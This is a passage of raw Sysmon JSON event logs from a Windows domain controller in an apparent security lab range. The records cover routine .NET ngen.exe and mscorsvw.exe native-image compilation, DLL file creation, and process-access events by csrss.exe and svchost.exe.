SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:26.119\r\nProcessGuid: {A837DB8D-0445-5F25-0000-0010F31C0C00}\r\nProcessId: 4344\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f8-0\\System.Net.Http.dll\r\nCreationUtcTime: 2020-08-01 05:57:26.119","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:26.119","ProcessGuid":"{A837DB8D-0445-5F25-0000-0010F31C0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f8-0\\System.Net.Http.dll","CreationUtcTime":"2020-08-01 05:57:26.119","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.150\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001088200C00}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.150","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001088200C00}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.150\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001088200C00}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.150","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001088200C00}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.165\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001088200C00}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.165","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001088200C00}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.244\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-00100F240C00}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.244","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-00100F240C00}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.244\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-00100F240C00}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.244","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-00100F240C00}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-00100F240C00}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-00100F240C00}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:26.556\r\nProcessGuid: {A837DB8D-0446-5F25-0000-00100F240C00}\r\nProcessId: 3904\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f40-0\\System.Xml.Linq.dll\r\nCreationUtcTime: 2020-08-01 05:57:26.556","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:26.556","ProcessGuid":"{A837DB8D-0446-5F25-0000-00100F240C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f40-0\\System.Xml.Linq.dll","CreationUtcTime":"2020-08-01 05:57:26.556","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.587\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001011280C00}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.587","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001011280C00}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET